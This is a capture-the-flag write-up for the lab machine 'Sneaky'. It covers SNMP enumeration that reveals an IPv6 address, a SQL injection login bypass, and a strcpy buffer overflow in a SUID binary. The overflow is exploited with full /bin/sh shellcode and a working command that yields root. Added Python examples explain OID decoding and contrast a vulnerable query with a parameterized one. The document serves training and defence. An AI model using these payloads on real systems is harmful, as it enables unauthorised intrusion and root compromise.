Difficulty Rating:

Machine: Sneaky
OS: Linux
Target IP: 10.10.10.20

  • Nmap scan for TCP
$ nmap -T4 -Pn -sV -A  10.10.10.20 

Starting Nmap 7.50 ( https://nmap.org ) at 2017-07-30 17:09 IST
Nmap scan report for 10.10.10.20
Host is up (0.15s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Under Development!

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.32 seconds
  • Nmap scan for UDP
$ sudo nmap -sV -Pn -A -sU 10.10.10.20

Starting Nmap 7.50 ( https://nmap.org ) at 2017-07-30 21:21 IST
Nmap scan report for 10.10.10.20
Host is up (0.63s latency).
Not shown: 999 closed ports
PORT    STATE SERVICE VERSION
161/udp open  snmp    SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info: 
|   enterprise: net-snmp
|   engineIDFormat: unknown
|   engineIDData: fcf2da02d0831859
|   snmpEngineBoots: 6
|_  snmpEngineTime: 4h14m51s
| snmp-interfaces: 
|   lo
|     IP address: 127.0.0.1  Netmask: 255.0.0.0
|     Type: softwareLoopback  Speed: 10 Mbps
|     Traffic stats: 184.80 Kb sent, 184.80 Kb received
|   eth0
|     IP address: 10.10.10.20  Netmask: 255.255.255.0
|     MAC address: 00:50:56:aa:0b:69 (VMware)
|     Type: ethernetCsmacd  Speed: 4 Gbps
|_    Traffic stats: 88.21 Mb sent, 84.90 Mb received
| snmp-netstat: 
|   TCP  127.0.0.1:3306       0.0.0.0:0
|_  UDP  0.0.0.0:161          *:*
| snmp-processes: 
|   1: 
|     Name: init
|   381: 
|     Name: upstart-udev-br
|   388: 
|     Name: systemd-udevd
|   466: 
|     Name: dbus-daemon
|   483: 
|     Name: systemd-logind
|   488: 
| 
|   496: 
| 
|   830: 
| 
|   886: 
| 
|   889: 
| 
|   894: 
| 
|   895: 
| 
|   898: 
| 
|   930: 
| 
|   933: 
| 
|   935: 
| 
|   936: 
| 
|   1042: 
| 
|   1048: 
| 
|   1130: 
| 
|   1173: 
| 
|   1498: 
| 
|   1507: 
| 
|   1536: 
| 
|   1537: 
| 
|   1541: 
| 
|   1592: 
| 
|   1612: 
| 
|   1614: 
| 
|   1615: 
| 
|_  1632: 
| snmp-sysdescr: Linux Sneaky 4.4.0-75-generic #96~14.04.1-Ubuntu SMP Thu Apr 20 11:06:56 UTC 2017 i686
|_  System uptime: 4h14m52.11s (1529211 timeticks)
|_snmp-win32-software: 
Too many fingerprints match this host to give specific OS details
Network Distance: 2 hops
Service Info: Host: Sneaky

TRACEROUTE (using port 63555/udp)
HOP RTT       ADDRESS
1   658.26 ms 10.10.14.1
2   659.87 ms 10.10.10.20

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1115.86 seconds

  • SNMP is enabled and answers the public community string
  • Using snmpwalk, let's find the IPv6 address
$ snmpwalk -v2c -c public 10.10.10.20 1.3.6.1.2.1.4.34.1.3
iso.3.6.1.2.1.4.34.1.3.1.4.10.10.10.20 = INTEGER: 2
iso.3.6.1.2.1.4.34.1.3.1.4.10.10.10.255 = INTEGER: 2
iso.3.6.1.2.1.4.34.1.3.1.4.127.0.0.1 = INTEGER: 1
iso.3.6.1.2.1.4.34.1.3.2.16.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.1 = INTEGER: 1
iso.3.6.1.2.1.4.34.1.3.2.16.222.173.190.239.0.0.0.0.2.80.86.255.254.170.11.105 = INTEGER: 2
iso.3.6.1.2.1.4.34.1.3.2.16.254.128.0.0.0.0.0.0.2.80.86.255.254.170.11.105 = INTEGER: 2
  • The address we need is 222.173.190.239.0.0.0.0.2.80.86.255.254.170.11.105
  • Each number is one octet in decimal; converting the 16 octets to hexadecimal gives dead:beef::0250:56ff:feaa:0b69
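The dotted decimal string above is how the IP-MIB ipAddressTable encodes an address in the OID index: the address type (1 = IPv4, 2 = IPv6), the length in octets, then one decimal number per octet. The Python below is an added example and not code from the original writeup: it parses the snmpwalk lines shown above (embedded as constructed sample input), decodes every index into an address, keeps only the IPv6 entries a remote scanner could reach, and, going one step beyond the text, rebuilds the same global address from the VMware MAC that nmap reported using the modified EUI-64 rule. Function names and the use of dead:beef::/64 as the SLAAC prefix are my assumptions.

```python
import ipaddress

# Constructed sample input: the snmpwalk lines from the writeup. The OID
# 1.3.6.1.2.1.4.34.1.3 is ipAddressIfIndex in the IP-MIB ipAddressTable; the
# index that follows it is <addrType>.<length>.<octet>.<octet>...
SNMPWALK_OUTPUT = """\
iso.3.6.1.2.1.4.34.1.3.1.4.10.10.10.20 = INTEGER: 2
iso.3.6.1.2.1.4.34.1.3.1.4.10.10.10.255 = INTEGER: 2
iso.3.6.1.2.1.4.34.1.3.1.4.127.0.0.1 = INTEGER: 1
iso.3.6.1.2.1.4.34.1.3.2.16.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.1 = INTEGER: 1
iso.3.6.1.2.1.4.34.1.3.2.16.222.173.190.239.0.0.0.0.2.80.86.255.254.170.11.105 = INTEGER: 2
iso.3.6.1.2.1.4.34.1.3.2.16.254.128.0.0.0.0.0.0.2.80.86.255.254.170.11.105 = INTEGER: 2
"""

IP_ADDRESS_IF_INDEX = "iso.3.6.1.2.1.4.34.1.3."


def decode_index(index):
    """Turn '<type>.<len>.<octets...>' into an IPv4Address or IPv6Address."""
    parts = [int(p) for p in index.split(".")]
    addr_type, length, octets = parts[0], parts[1], parts[2:]
    if len(octets) != length or any(o > 255 for o in octets):
        raise ValueError(f"malformed index {index!r}")
    if addr_type == 1 and length == 4:
        return ipaddress.IPv4Address(bytes(octets))
    if addr_type == 2 and length == 16:
        return ipaddress.IPv6Address(bytes(octets))
    raise ValueError(f"unsupported address type {addr_type}/len {length}")


def parse_snmpwalk(text):
    """Return [(address, ifIndex)] for every ipAddressIfIndex line."""
    entries = []
    for line in text.splitlines():
        if not line.startswith(IP_ADDRESS_IF_INDEX):
            continue
        oid, _, value = line.partition(" = ")
        if_index = int(value.rsplit(":", 1)[-1])
        entries.append((decode_index(oid[len(IP_ADDRESS_IF_INDEX):]), if_index))
    return entries


def routable_ipv6(entries):
    """IPv6 addresses that are neither loopback nor link-local: the ones a
    scanner on another network could actually reach."""
    return [str(a) for a, _ in entries
            if a.version == 6 and not a.is_loopback and not a.is_link_local]


def eui64_interface_id(mac):
    """Modified EUI-64 interface identifier from a 48-bit MAC (RFC 4291, App. A):
    flip the universal/local bit of the first octet and insert ff:fe in the middle."""
    octets = bytes(int(x, 16) for x in mac.split(":"))
    if len(octets) != 6:
        raise ValueError(f"not a 48-bit MAC: {mac!r}")
    return bytes([octets[0] ^ 0x02]) + octets[1:3] + b"\xff\xfe" + octets[3:]


def slaac_address(prefix, mac):
    """Predict the SLAAC address a host with this MAC gets on a /64 prefix (assumed /64)."""
    net = ipaddress.IPv6Network(prefix)
    if net.prefixlen != 64:
        raise ValueError("SLAAC uses a /64 prefix")
    return ipaddress.IPv6Address(net.network_address.packed[:8] + eui64_interface_id(mac))


if __name__ == "__main__":
    found = parse_snmpwalk(SNMPWALK_OUTPUT)
    for addr, ifidx in found:
        print(f"ifIndex {ifidx}: {addr}")
    print("scan targets:", routable_ipv6(found))
    # The MAC nmap reported for eth0 reproduces the same global address.
    print("from MAC    :", slaac_address("dead:beef::/64", "00:50:56:aa:0b:69"))
```

Two things stand out from the defending side: a read-only community string of public hands out the entire address table, including addresses the IPv4 scan never showed, and an EUI-64 SLAAC address is derivable from the MAC, so it is no secret even without SNMP. Restricting SNMP read access and using privacy or stable-random interface identifiers both reduce that exposure.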

  • Nmap on the IPv6 address
$ nmap -sV -A -6 dead:beef::0250:56ff:feaa:0b69

Starting Nmap 7.50 ( https://nmap.org ) at 2017-07-30 22:11 IST
Nmap scan report for dead:beef::250:56ff:feaa:b69
Host is up (0.14s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 5d:5d:2a:97:85:a1:20:e2:26:e4:13:54:58:d6:a4:22 (DSA)
|   2048 a2:00:0e:99:0f:d3:ed:b0:19:d4:6b:a8:b1:93:d9:87 (RSA)
|   256 e3:29:c4:cb:87:98:df:99:6f:36:9f:31:50:e3:b9:42 (ECDSA)
|_  256 e6:85:a8:f8:62:67:f7:01:28:a1:aa:00:b5:60:f2:21 (EdDSA)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: 400 Bad Request
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| address-info: 
|   IPv6 EUI-64: 
|     MAC address: 
|       address: 00:50:56:aa:0b:69
|_      manuf: VMware

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.18 seconds
  • Ports 22 and 80 are open on the IPv6 address

  • Dirb

$ dirb http://10.10.10.20

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun Jul 30 17:33:03 2017
URL_BASE: http://10.10.10.20/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.10.20/ ----
==> DIRECTORY: http://10.10.10.20/dev/                                                                                   
+ http://10.10.10.20/index.html (CODE:200|SIZE:183)                                                                            
+ http://10.10.10.20/server-status (CODE:403|SIZE:291)                                                                          
                                                                                                                                                                                             
---- Entering directory: http://10.10.10.20/dev/ ----
+ http://10.10.10.20/dev/index.html (CODE:200|SIZE:464)                                                                        
                                                                                                                                                                                             
-----------------
END_TIME: Sun Jul 30 18:06:14 2017
DOWNLOADED: 9224 - FOUND: 3
  • Visiting 10.10.10.8/dev/index.html gives a login box
  • It is vulnerable to SQL injection
  • Enter ' or 1=1;# to get access
  • You get an SSH private key and two usernames.
  • SSH is running on the IPv6 address
  • Let's connect
$ ssh -i new_key.txt thrasivoulos@dead:beef::0250:56ff:feaa:0b69
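Why ' or 1=1;# bypasses the login, and what the fix looks like, as an added Python example that is not code from the original writeup or from the box itself. It implements the login check two ways against a constructed in-memory SQLite table: once by string concatenation, the pattern the vulnerable page must be using, and once with bound parameters. The SNMP netstat shows MySQL on 3306, and in MySQL a # starts a comment; SQLite has no # comment, so a small helper strips that tail to mirror what the MySQL parser sees. The table layout, account names and helper names are assumptions.

```python
import sqlite3

PAYLOAD = "' or 1=1;#"   # the login bypass string used in the writeup


def make_db():
    """Constructed demo database: an in-memory SQLite table with two accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("admin", "s3cret-admin-pw"), ("guest", "guest")],
    )
    return conn


def as_mysql_would_parse(sql):
    """Emulation for the demo only: MySQL treats '#' as a start-of-comment
    marker and ignores the rest of the line. SQLite has no '#' comment, so
    drop that tail here to show what the MySQL server behind the real login
    form ends up executing."""
    return sql.split("#", 1)[0]


def rendered_vulnerable_sql(username, password):
    """The concatenated query text, before the database comments out the tail."""
    return (f"SELECT id, username FROM users "
            f"WHERE username = '{username}' AND password = '{password}'")


def login_vulnerable(conn, username, password):
    """The broken pattern: user input is pasted straight into the SQL text.
    With the payload as username the WHERE clause collapses to
    username = '' or 1=1 and the password check is commented away, so the
    first row (admin) comes back."""
    sql = as_mysql_would_parse(rendered_vulnerable_sql(username, password))
    row = conn.execute(sql).fetchone()
    return row[1] if row else None


def login_parameterized(conn, username, password):
    """The fix: placeholders. The driver sends the values separately from the
    statement, so a quote or '#' inside them is just data, never syntax."""
    row = conn.execute(
        "SELECT id, username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[1] if row else None


if __name__ == "__main__":
    db = make_db()
    print(rendered_vulnerable_sql(PAYLOAD, "x"))
    print("vulnerable   :", login_vulnerable(db, PAYLOAD, "x"))
    print("parameterized:", login_parameterized(db, PAYLOAD, "x"))
```

The parameterized version returns no row for the payload while still logging in the legitimate guest account, which is the whole point: the fix is in how the query is built, not in filtering the input.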
  • To own the system, check for SUID files
$ find / -perm -4000 -user root -exec ls -ld {} \; 2>/dev/null
  • We find an executable named /usr/local/bin/chal
  • After examining the executable, we find it is a 32-bit ELF binary that uses strcpy().
  • strcpy() copies without any bounds check, so it is vulnerable to a buffer overflow
  • After running it under gdb and working out the stack layout, the following command runs a shell as root.
  • The shell code used is
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80
thrasivoulos@Sneaky:/usr/local/bin$ ./chal $(python -c 'print "\x90"*330 +"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80" + "\x42\xf4\xff\xbf"*30')
# id
uid=1000(thrasivoulos) gid=1000(thrasivoulos) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare),1000(thrasivoulos)
# cat /root/root.txt
XXXXXXXXXX
  • The address \x42\xf4\xff\xbf is what ends up in the saved $ebp and $eip. It points to one of the NOP instructions in the sled, so execution slides down into the shellcode.
User and Root owned!!

SNMP wikipedia
LiveOverflow tutorials on BOFs
Resource for getting different shellcodes

Share the fun!